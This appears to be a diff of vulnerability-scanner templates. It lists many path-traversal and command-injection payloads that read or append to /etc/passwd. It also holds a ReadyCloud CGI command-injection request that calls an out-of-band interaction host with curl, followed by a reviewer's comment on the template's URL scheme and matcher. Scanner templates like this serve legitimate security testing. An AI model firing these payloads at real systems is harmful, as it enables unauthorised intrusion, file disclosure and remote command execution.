"forum_arc.asp?n=/../../../../../../../../etc/passwd|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 370 + - "forum_arc.asp?n=/etc/passwd%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 371 + - "forum_arc.asp?n=/etc/passwd|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 372 + - "forum_professionnel.asp?n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'." 373 + - "forum_professionnel.asp?n=../../../../../../../../../etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 374 + - "forum_professionnel.asp?n=/../../../../../../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 
375 + - "forum_professionnel.asp?n=/etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 376 + - "forum_professionnel.asp?n=/etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 377 + - "gallery/index.php?include=../../../../../../../../../etc/passwd" 378 + - "generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1" 379 + - "guestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd|" 380 + - "hsx.cgi?show=../../../../../../../../../../../etc/passwd%00" 381 + - "htgrep?file=index.html&hdr=/etc/passwd" 382 + - "htmlscript?../../../../../../../../../../etc/passwd" 383 + - "htsearch?exclude=%60/etc/passwd%60" 384 + - "i?/etc/passwd" 385 + - "imprimer.asp?no=%60/etc/passwd%60|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'." 386 + - "imprimer.asp?no=../../../../../../../../../etc/passwd%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 387 + - "imprimer.asp?no=/../../../../../../../../etc/passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 388 + - "imprimer.asp?no=/etc/passwd%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 389 + - "imprimer.asp?no=/etc/passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 
390 + - "index.php?download=/etc/passwd" 391 + - "index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd" 392 + - "index.php?page=../../../../../../../../../../etc/passwd" 393 + - "index.php?|=../../../../../../../../../etc/passwd" 394 + - "info2www '(../../../../../../../bin/mail root </etc/passwd>" 395 + - "ion-p?page=../../../../../etc/passwd" 396 + - "jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd" 397 + - "jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../etc/passwd" 398 + - "k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor" 399 + - "loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd" 400 + - "logbook.pl?file=../../../../../../../bin/cat%20/etc/passwd%00|" 401 + - "magiccard.cgi?pa=3Dpreview&next=3Dcustom&page=3D../../../../../../../../../../etc/passwd" 402 + - "mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00" 403 + - "mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00" 404 + - "mailview.cgi?cmd=view&fldrname=inbox&select=1&html=../../../../../../etc/passwd" 405 + - "main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd" 406 + - "modif_infos.asp?n=%60/etc/passwd%60" 407 + - "modif_infos.asp?n=../../../../../../../../../etc/passwd%00" 408 + - "modif_infos.asp?n=/../../../../../../../../../etc/passwd" 409 + - "modif_infos.asp?n=/etc/passwd" 410 + - "modif_infos.asp?n=/etc/passwd%00" 411 + - "modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd" 412 + - "mrtg.cfg?cfg=../../../../../../../../etc/passwd" 413 + - "mrtg.cgi?cfg=../../../../../../../../etc/passwd" 414 + - "multihtml.pl?multi=/etc/passwd%00html" 415 + - "mylog.html?screen=/etc/passwd" 416 + - "mylog.phtml?screen=/etc/passwd" 417 + - "netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd" 418 + - 
"netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd" 419 + - "newsdesk.cgi?t=../../../../../../../../../../etc/passwd" 420 + - "nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00" 421 + - "nph-emumail.cgi?type=/../../../../../../../../../../../../../../../etc/passwd%00" 422 + - "nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0" 423 + - "opendir.php?/etc/passwd" 424 + - "opendir.php?requesturl=/etc/passwd" 425 + - "page.cgi?../../../../../../../../../../etc/passwd" 426 + - "pals-cgi?palsAction=restart&documentName=/etc/passwd" 427 + - perl/-e%20%22system('cat%20/etc/passwd');\%22 428 + - "pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|'" 429 + - "pfdispaly.cgi?../../../../../../../../../../etc/passwd" 430 + - "pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'" 431 + - "phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd" 432 + - "phf?Qname=root%0Acat%20/etc/passwd%20" 433 + - "php.cgi?/etc/passwd" 434 + - "php/mylog.html?screen=/etc/passwd" 435 + - "php/mylog.phtml?screen=/etc/passwd" 436 + - "phprocketaddin/?page=../../../../../../../../../../etc/passwd" 437 + - "phptonuke.php?filnavn=/etc/passwd" 438 + - "phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd" 439 + - "powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd" 440 + - "publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10" 441 + - "put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd" 442 + - "quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=" 443 + - "r.cgi?FILE=../../../../../../../../../../etc/passwd" 444 + - "rubrique.asp?no=%60/etc/passwd%60|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'." 445 + - "rubrique.asp?no=../../../../../../../../../etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 
446 + - "rubrique.asp?no=/../../../../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 447 + - "rubrique.asp?no=/../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 448 + - "rubrique.asp?no=/etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 449 + - "rubrique.asp?no=/etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 450 + - "sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1" 451 + - "search.pl?form=../../../../../../../../../../etc/passwd%00" 452 + - "search?NS-query-pat=../../../../../../../../../../etc/passwd" 453 + - "sendtemp.pl?templ=../../../../../../../../../../etc/passwd" 454 + - "servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00" 455 + - "sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd" 456 + - "shop.cgi?page=../../../../../../../etc/passwd" 457 + - "shop/member_html.cgi?file=;cat%20/etc/passwd|" 458 + - "shop/member_html.cgi?file=|cat%20/etc/passwd|" 459 + - "shop/normal_html.cgi?file=;cat%20/etc/passwd|" 460 + - "shop/normal_html.cgi?file=|cat%20/etc/passwd|" 461 + - "shopper.cgi?newpage=../../../../../../../../../../etc/passwd" 462 + - "shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|" 463 + - "shoutbox.php?conf=../../../../../../../etc/passwd" 464 + - "shoutbox/expanded.php?conf=../../../../../../../etc/passwd%20" 465 + - "simple/view_page?mv_arg=|cat%20/etc/passwd|" 466 + - "smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|" 467 + - "smartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|" 468 + - "ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" 469 + - "store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html" 470 + - "store/index.cgi?page=../../../../../../../../etc/passwd" 471 + - 
"story.pl?next=../../../../../../../../../../etc/passwd%00" 472 + - "story/story.pl?next=../../../../../../../../../../etc/passwd%00" 473 + - "support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd" 474 + - "talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1" 475 + - "technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd" 476 + - "technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../etc/passwd" 477 + - "tmp_view.php?file=/etc/passwd" 478 + - "traffic.cgi?cfg=../../../../../../../../etc/passwd" 479 + - "ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd" 480 + - "userreg.cgi?cmd=insert&lang=eng&tnum=3&fld1=test999%0acat</var/spool/mail/login>>/etc/passwd" 481 + - "ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd" 482 + - "view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00" 483 + - "viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1" 484 + - "viewpage.php?file=/etc/passwd" 485 + - "viewsource?/etc/passwd" 486 + - "way-board.cgi?db=/etc/passwd%00" 487 + - "way-board/way-board.cgi?db=/etc/passwd%00" 488 + - "webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif" 489 + - "webbbs/webbbs_config.pl?name=joe&[email protected]&body=aaaaffff&followup=10;cat%20/etc/passwd" 490 + - "webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd" 491 + - "webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD" 492 + - "webdist.cgi?distloc=;cat%20/etc/passwd" 493 + - "webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00" 494 + - "webplus?script=../../../../../../../../../../etc/passwd" 495 + - "webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd" 496 + - "whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd" 497 + - 
"whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd" 498 + - "whois_raw.cgi?fqdn=%0Acat%20/etc/passwd" 499 + - "zml.cgi?file=../../../../../../../../../../etc/passwd%00" 500 + - "~nobody/etc/passwd" 501 + attack: clusterbomb 502 + stop-at-first-match: true 503 + matchers: 504 + - type: word 505 + part: body 506 + words: 507 + - 'root:x:' 508 + 509 + redirects: false 510 + -
skipped 22 lines 23 23 POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1 24 24 Host: {{Hostname}} 25 25 26 - "name":"';$(curl http://{{interactsh-url}});'", 26 + "name":"';$(curl {{interactsh-url}});'", 27 27 "email":"[email protected]" 28 28 29 29 matchers: skipped 7 lines -
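Review bot: With the scheme dropped in `"name":"';$(curl {{interactsh-url}});'"`, protocol selection is left to curl's guess from the hostname, and nothing in the visible lines records that this is intended. The matchers block sits in the skipped lines, so it cannot be confirmed here, but if it keys only on an `http` interaction, a target whose curl resolves the name without completing the request would be reported as clean. I would add a YAML comment above the `raw:` entry (not inside the block scalar, where it would become part of the request) such as `# no scheme: curl falls back to http; a dns-only interaction also counts as a hit`, and check that the matcher accepts `dns` as well as `http`.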